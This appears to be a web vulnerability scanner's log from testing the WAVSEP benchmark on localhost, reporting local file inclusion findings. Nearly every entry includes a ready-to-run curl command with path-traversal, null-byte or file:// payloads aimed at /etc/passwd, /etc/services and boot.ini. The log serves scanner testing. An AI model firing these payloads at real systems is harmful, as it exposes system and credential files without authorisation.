curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
